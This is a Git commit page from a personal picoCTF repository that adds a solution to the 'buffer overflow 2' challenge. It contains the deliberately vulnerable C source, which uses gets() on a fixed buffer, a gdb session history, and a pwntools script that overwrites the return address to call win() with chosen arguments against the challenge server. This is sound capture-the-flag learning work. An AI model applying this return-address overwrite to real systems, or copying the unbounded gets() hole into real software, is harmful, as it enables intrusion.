theon-1/picoCTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

buffer overflow 2

Browse Source
This commit is contained in:
THEON-1
2025-12-20 21:23:48 +01:00
parent 2359a500a2
commit 13815ed351
5 changed files with 245 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

176
buffer_overflow_2/.gdb_history Normal file
View File

@@ -0,0 +1,176 @@
r
exit
exit
disassemble vuln
b *vuln+44
c
c
exit
b *vuln+44
c
stackf
disassemble vuln
b *vuln+29
exit
b *vuln+29
c
b *vuln+29
continue
disassemble vuln
b *vuln+44
c
stackf
hexdump
hexdump
hexdump help
hexdump $sp 20
hexdump $sp 20
hexdump $sp 100
hexdump $sp 120
hexdump $sp 140
hexdump $sp 160
c
c
b *vuln+44
c
stackf
disassemble win
b *win
c
stackf
disassemble win
b *win+11
c
stackf
c
b *win+11
c
c
exit
b *win+11
c
stackf
nexti
exit
disassemble vuln
b *vuln+75
c
disassemble vuln
b *vuln+57
c
nexti
stackf
disassemble vuln
disassemble win
hexdump $ebp+0x08
stackf
c
disassemble win
b *win+118
c
c
exit
b *win+118
c
b *vuln+57
c
stackf
nexti
stackf
disassemble win
b *win+16
c
stackf
disassemble win
stackf
hexdump $sp 100
hexdump $sp 200
c
c
b *win+16
c
hexdump $sp 200
stackf
c
c
c
exit
c
stackf
disassemble win
b *win+7
exit
b *win+7
c
stackf
hexdump $sp 200
c
exit
b *win+7
c
stackf
hexdump $sp 200
disassemble *main
exit
b *win+7
c
stackf
hexdump $sp 200
disassemble *win
nexti
disassemble *win
nexti
disassemble *win
nexti
disassemble *win
hexdump $sp 200
nexti
hexdump $sp 200
c
c
exit
disassemble *win
b *win+118
c
stackf
hexdump $sp 200
disassemble *win
b *win+118
c
hexdump $sp 200
disassemble *win
hexdump $ebp
b *win+118
c
disassemble *win
stackf
c
c
exit
b *win+118
c
stackf
disassemble win
hexdump $ebp
hexdump $ebp+8
nexti
nexti
stackf
b *win+118
c
nexti
nexti
hexdump $ebp
hexdump $ebp+8
hexdump $ebp+12
c
b *win+118
c
stackf
disassemble win
b *win+143
c
disassemble win
nexti
c
exit

1
buffer_overflow_2/flag.txt Normal file
View File

@@ -0,0 +1 @@
{test}

24
buffer_overflow_2/sol.py Executable file
View File

@@ -0,0 +1,24 @@
#!/usr/bin/env python
from pwn import *
context.terminal = "kitty"
win_address = 0x08049296
buffer_base = 0xfffe422c
ret_location = 0xfffe429c
ret_offset = ret_location - buffer_base
ebp_offset = 112
arg1 = 0xCAFEF00D
arg2 = 0xF00DF00D
conn = remote("saturn.picoctf.net", 56706)
#conn = process("./vuln")
#attach(conn)
conn.recvline()
conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
conn.recvline()
rest = conn.recvuntil(b'}')
log.info(f"got {rest}")

BIN
buffer_overflow_2/vuln Executable file
View File

Binary file not shown.

44
buffer_overflow_2/vuln.c Normal file
View File

@@ -0,0 +1,44 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D)
return;
if (arg2 != 0xF00DF00D)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}